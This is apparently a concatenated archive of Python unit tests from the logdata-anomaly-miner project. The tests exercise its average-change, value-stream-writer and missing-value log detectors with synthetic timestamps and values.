match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 2000), start_time + 2000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 2000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) # compare Data match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 10000), start_time + 10000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 10000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 20000), start_time + 20000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 20000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), '') def test2receive_atom_min_bin_time_not_reached(self): """This test verifies, that no statistic evaluation is performed, until the start time is reached.""" description = "Test2MatchValueAverageChangeDetector" start_time = 57600 match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None) match_value_average_change_detector = MatchValueAverageChangeDetector( self.aminer_config, [self.stream_printer_event_handler], 'time', [match_element1.get_path()], 3, start_time + 86400, False, 'Default') self.analysis_context.register_component(match_value_average_change_detector, description) # create oldBin log_atom = LogAtom(match_element1.get_match_object(), ParserMatch(match_element1), start_time, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 1000), start_time + 1000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 1000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 2000), start_time + 2000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 2000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) # compare Data match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 10000), start_time + 10000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 10000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 20000), start_time + 20000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 20000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 30000), start_time + 30000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 30000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), '') def test3receive_atom_statistically_ok(self): """This test case focuses on receiving an atom and being in the statistically acceptable area.""" description = "Test3MatchValueAverageChangeDetector" start_time = 57600 match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None) match_value_average_change_detector = MatchValueAverageChangeDetector( self.aminer_config, [self.stream_printer_event_handler], 'time', [match_element1.get_path()], 3, start_time, False, 'Default') self.analysis_context.register_component(match_value_average_change_detector, description) # create oldBin log_atom = LogAtom(match_element1.get_match_object(), ParserMatch(match_element1), start_time, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 1000), start_time + 1000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 1000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 2000), start_time + 2000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 2000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) # compare Data match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 11000), start_time + 11000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 11000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 12000), start_time + 12000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 12000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 13000), start_time + 13000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 13000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), '') def test4receiveAtomStatisticallyOutOfRange(self): """This test case focuses on receiving an atom and being over the statistically acceptable area.""" description = "Test4MatchValueAverageChangeDetector" start_time = time.time() match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None) match_value_average_change_detector = MatchValueAverageChangeDetector( self.aminer_config, [self.stream_printer_event_handler], None, [match_element1.get_path()], 3, start_time, False, 'Default') self.analysis_context.register_component(match_value_average_change_detector, description) # create oldBin log_atom = LogAtom(match_element1.get_match_object(), ParserMatch(match_element1), start_time, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 1000), start_time + 1000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 1000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 2000), start_time + 2000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 2000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) # compare Data match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 10000), start_time + 10000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 10000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 20000), start_time + 20000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 20000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 30000), start_time + 30000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 30000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(start_time + 30000).strftime("%Y-%m-%d %H:%M:%S"), match_value_average_change_detector.__class__.__name__, description, 6, start_time + 20000, start_time + 1000)) def test5more_values(self): """This test case proves the functionality, when using more than one path.""" description = "Test5MatchValueAverageChangeDetector" start_time = time.time() match_element1 = MatchElement(self.cron_job1, b"%d" % start_time, start_time, None) match_element2 = MatchElement(self.cron_job2, b"%d" % start_time, start_time, None) match_value_average_change_detector = MatchValueAverageChangeDetector( self.aminer_config, [self.stream_printer_event_handler], None, [ match_element1.get_path(), match_element2.get_path()], 2, start_time, False, 'Default') self.analysis_context.register_component(match_value_average_change_detector, description) # create oldBin log_atom = LogAtom(match_element1.get_match_object(), ParserMatch(match_element1), start_time, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 1000), start_time + 1000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 1000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) # create oldBin for ME2 log_atom = LogAtom(match_element2.get_match_object(), ParserMatch(match_element2), start_time, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element2 = MatchElement(self.cron_job2, b"%d" % (start_time + 1000), start_time + 1000, None) log_atom = LogAtom( match_element2.get_match_object(), ParserMatch(match_element2), start_time + 1000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) # compare data match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 10000), start_time + 10000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 10000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element1 = MatchElement(self.cron_job1, b"%d" % (start_time + 20000), start_time + 20000, None) log_atom = LogAtom( match_element1.get_match_object(), ParserMatch(match_element1), start_time + 20000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), '') # compare data with ME2 match_element2 = MatchElement(self.cron_job2, b"%d" % (start_time + 11000), start_time + 11000, None) log_atom = LogAtom( match_element2.get_match_object(), ParserMatch(match_element2), start_time + 11000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) match_element2 = MatchElement(self.cron_job2, b"%d" % (start_time + 22000), start_time + 22000, None) log_atom = LogAtom( match_element2.get_match_object(), ParserMatch(match_element2), start_time + 22000, match_value_average_change_detector) match_value_average_change_detector.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), self.__expected_string2 % ( datetime.fromtimestamp(start_time + 22000).strftime("%Y-%m-%d %H:%M:%S"), match_value_average_change_detector.__class__.__name__, description, 4, start_time + 15000, start_time + 500, start_time + 16500, start_time + 500)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/MatchValueStreamWriterTest.py000066400000000000000000000225351437606560100314320ustar00rootroot00000000000000import unittest from _io import BytesIO from aminer.parsing.MatchContext import MatchContext from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from unit.TestBase import TestBase class MatchValueStreamWriterTest(TestBase): """Unittests for the MatchValueStreamWriter.""" euro = b'Euro ' match_sequence_s1 = 'match/sequence/s1' match_sequence_d1 = 'match/sequence/d1' def test1all_atoms_match(self): """This test case sets up a set of values, which are all expected to be matched.""" description = "Test1MatchValueStreamWriter" output_stream = BytesIO() match_context = MatchContext(b'25537Euro 25538Euro 25539Euro 25540Euro ') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) fixed_dme = FixedDataModelElement('s1', self.euro) sequence_model_element = SequenceModelElement('sequence', [decimal_integer_value_me, fixed_dme]) match_value_stream_writer = MatchValueStreamWriter(output_stream, [self.match_sequence_d1, self.match_sequence_s1], b';', b'-') self.analysis_context.register_component(match_value_stream_writer, description) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) self.assertEqual(output_stream.getvalue().decode(), '25537;Euro \n25538;Euro \n25539;Euro \n25540;Euro \n') def test2all_atoms_match_no_seperator(self): """ This test case sets up a set of values, which are all expected to be matched. The seperator string is None, so all values are expected to be one string. """ description = "Test2MatchValueStreamWriter" output_stream = BytesIO() match_context = MatchContext(b'25537Euro 25538Euro 25539Euro 25540Euro ') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) fixed_dme = FixedDataModelElement('s1', self.euro) sequence_model_element = SequenceModelElement('sequence', [decimal_integer_value_me, fixed_dme]) match_value_stream_writer = MatchValueStreamWriter(output_stream, [self.match_sequence_d1, self.match_sequence_s1], b'', b'-') self.analysis_context.register_component(match_value_stream_writer, description) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) self.assertEqual(output_stream.getvalue().decode(), '25537Euro \n25538Euro \n25539Euro \n25540Euro \n') def test3atom_no_match_missing_value_string_empty(self): """ This test case sets up a set of values, which are all expected to be matched. The missing value string is None, so when a string does not match it is simply ignored. """ description = "Test3MatchValueStreamWriter" output_stream = BytesIO() match_context = MatchContext(b'25537Euro 25538Euro 25539Euro 25540Pfund ') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) fixed_dme = FixedDataModelElement('s1', self.euro) sequence_model_element = SequenceModelElement('sequence', [decimal_integer_value_me, fixed_dme]) match_value_stream_writer = MatchValueStreamWriter(output_stream, [self.match_sequence_d1, self.match_sequence_s1], b';', b'') self.analysis_context.register_component(match_value_stream_writer, description) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = decimal_integer_value_me.get_match_element('match', match_context) match_element.path = self.match_sequence_d1 log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) self.assertEqual(output_stream.getvalue().decode(), '25537;Euro \n25538;Euro \n25539;Euro \n25540;\n') def test4atom_no_match_missing_value_string_set(self): """ This test case sets up a set of values, which are all expected to be matched. The missing value string is set to a value, so when a string does not match this value is used instead. """ description = "Test4MatchValueStreamWriter" output_stream = BytesIO() match_context = MatchContext(b'25537Euro 25538Euro 25539Euro 25540Pfund ') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) fixed_dme = FixedDataModelElement('s1', self.euro) sequence_model_element = SequenceModelElement('sequence', [decimal_integer_value_me, fixed_dme]) match_value_stream_writer = MatchValueStreamWriter(output_stream, [self.match_sequence_d1, self.match_sequence_s1], b';', b'-') self.analysis_context.register_component(match_value_stream_writer, description) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = sequence_model_element.get_match_element('match', match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) match_element = decimal_integer_value_me.get_match_element('match', match_context) match_element.path = self.match_sequence_d1 log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, match_value_stream_writer) match_value_stream_writer.receive_atom(log_atom) self.assertEqual(output_stream.getvalue().decode(), '25537;Euro \n25538;Euro \n25539;Euro \n25540;-\n') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/MissingMatchPathValueDetectorTest.py000066400000000000000000000732511437606560100327230ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector, MissingMatchPathListValueDetector import time from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from unit.TestBase import TestBase from datetime import datetime, timezone class MissingMatchPathValueDetectorTest(TestBase): """Unittests for the MissingMatchPathValueDetector.""" __expected_string = '%s Interval too large between values\n%s: "%s" (%d lines)\n %s\n\n' __default_interval = 3600 __realert_interval = 86400 pid = b' pid=' datetime_format_string = '%Y-%m-%d %H:%M:%S' match1_s1_overdue = "['match1/s1']: \"[' pid=']\" overdue 400s (interval -400)" string = b'25537 uid=2' def test1_receive_atom(self): """This test case checks whether a missing value is created without using the learn_mode (should not be the case).""" description = "Test1MissingMatchPathValueDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [match_element_fixed_dme.get_path()], [ self.stream_printer_event_handler], 'Default', False, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), 1, missing_match_path_value_detector) self.assertTrue(missing_match_path_value_detector.receive_atom(log_atom_fixed_dme)) def test2_receive_atom_without_match_element(self): """This test case checks if the ReceiveAtom controls the MatchElement and responds correctly, when it is missing.""" description = "Test2MissingMatchPathValueDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) match_context_fixed_dme = MatchContext(self.pid) matchElementFixedDME2 = fixed_dme.get_match_element("match2", match_context_fixed_dme) missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [match_element_fixed_dme.get_path()], [ self.stream_printer_event_handler], 'Default', False, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(matchElementFixedDME2), 1, missing_match_path_value_detector) self.assertFalse(missing_match_path_value_detector.receive_atom(log_atom_fixed_dme)) def test3_receive_atom_no_missing_value(self): """This test case checks whether the class returns wrong positives, when the time limit is not passed.""" description = "Test3MissingMatchPathValueDetector" t = time.time() match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [match_element_fixed_dme.get_path()], [ self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, missing_match_path_value_detector) self.assertTrue(missing_match_path_value_detector.receive_atom(log_atom_fixed_dme)) past_time = 3200 missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [match_element_fixed_dme.get_path()], [ self.stream_printer_event_handler], 'Default', True, missing_match_path_value_detector.default_interval - past_time, self.__realert_interval) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t + past_time, missing_match_path_value_detector) self.assertTrue(missing_match_path_value_detector.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), '') def test4_receive_atom_missing_value(self): """This test case checks if missing values are reported correctly.""" description = "Test4MissingMatchPathValueDetector" t = time.time() match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [match_element_fixed_dme.get_path()], [ self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, missing_match_path_value_detector) self.assertTrue(missing_match_path_value_detector.receive_atom(log_atom_fixed_dme)) past_time = 4000 missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [match_element_fixed_dme.get_path()], [ self.stream_printer_event_handler], 'Default', True, missing_match_path_value_detector.default_interval - past_time, self.__realert_interval, output_logline=False) self.analysis_context.register_component(missing_match_path_value_detector, description + "2") log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t + past_time, missing_match_path_value_detector) self.assertTrue(missing_match_path_value_detector.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t + past_time).strftime(self.datetime_format_string), missing_match_path_value_detector.__class__.__name__, description + "2", 1, self.match1_s1_overdue)) def test5_missing_value_on_persisted(self): """Persisting elements is tested in this test case.""" description = "Test5MissingMatchPathValueDetector" t = time.time() match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [match_element_fixed_dme.get_path()], [ self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t), missing_match_path_value_detector) self.assertTrue(missing_match_path_value_detector.receive_atom(log_atom_fixed_dme)) missing_match_path_value_detector.do_persist() past_time = 4000 other_missing_match_path_value_detector = MissingMatchPathValueDetector(self.aminer_config, [match_element_fixed_dme.get_path()], [ self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(other_missing_match_path_value_detector, description + "2") other_missing_match_path_value_detector.last_seen_timestamp = t + past_time other_missing_match_path_value_detector.set_check_value(other_missing_match_path_value_detector.get_channel_key( log_atom_fixed_dme)[1], self.__default_interval - past_time, [match_element_fixed_dme.get_path()]) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t) + past_time, other_missing_match_path_value_detector) self.assertTrue(other_missing_match_path_value_detector.receive_atom(log_atom_fixed_dme)) # skipcq: PYL-R1714 self.assertTrue((self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time).strftime(self.datetime_format_string), other_missing_match_path_value_detector.__class__.__name__, description + "2", 1, self.match1_s1_overdue)) or ( self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time + 1).strftime(self.datetime_format_string), other_missing_match_path_value_detector.__class__.__name__, description + "2", 1, self.match1_s1_overdue))) def test6_receive_atom_list(self): """This test case checks, whether a missing value is created by a list without using the learn_mode.""" description = "Test6MissingMatchPathValueDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(self.string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element( "match2", match_context_decimal_integer_value_me) missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', False, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), 1, missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) def test7_receive_atom_list_without_match_element(self): """This test case checks if the ReceiveAtom controls the list of MatchElements and responds correctly, when a value is missing.""" description = "Test7MissingMatchPathValueDetector" match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(self.string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element( "match2", match_context_decimal_integer_value_me) match_context_fixed_dme = MatchContext(self.pid) matchElementFixedDME2 = fixed_dme.get_match_element("match3", match_context_fixed_dme) missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', False, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(matchElementFixedDME2), 1, missing_match_path_list_value_detector) self.assertFalse(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) def test8_receive_atom_list_no_missing_value(self): """This test case checks whether the class returns wrong positives on lists, when the time limit should not be passed.""" description = "Test8MissingMatchPathValueDetector" t = time.time() match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(self.string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element( "match2", match_context_decimal_integer_value_me) missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t), missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) past_time = 3200 missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, missing_match_path_list_value_detector.default_interval - past_time, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description + "2") log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t) + past_time, missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), '') def test9_receive_atom_list_missing_value(self): """This test case checks if missing values are reported correctly.""" description = "Test90MissingMatchPathValueDetector" t = time.time() match_context_fixed_dme = MatchContext(self.pid) fixed_dme = FixedDataModelElement('s1', self.pid) match_element_fixed_dme = fixed_dme.get_match_element("match1", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(self.string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element( "match2", match_context_decimal_integer_value_me) missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, self.__default_interval, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t), missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) past_time = 4000 missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, [ match_element_fixed_dme.get_path(), match_element_decimal_integer_value_me.get_path()], [self.stream_printer_event_handler], 'Default', True, missing_match_path_list_value_detector.default_interval - past_time, self.__realert_interval) self.analysis_context.register_component(missing_match_path_list_value_detector, description + "2") log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), round(t) + past_time, missing_match_path_list_value_detector) self.assertTrue(missing_match_path_list_value_detector.receive_atom(log_atom_fixed_dme)) # skipcq: PYL-R1714 self.assertTrue((self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time).strftime(self.datetime_format_string), missing_match_path_list_value_detector.__class__.__name__, description + "2", 1, "match1/s1, match2/d1: ' pid=' overdue 400s (interval -400)")) or (self.output_stream.getvalue() == self.__expected_string % ( datetime.fromtimestamp(t + past_time + 1).strftime(self.datetime_format_string), missing_match_path_list_value_detector.__class__.__name__, description + "2", 1, "match1/s1, match2/d1: ' pid=' overdue 400s (interval -400)"))) def test10_missing_value_on_persisted(self): """Persisting lists is tested in this test case.""" description = "Test91MissingMatchPathValueDetector" t = 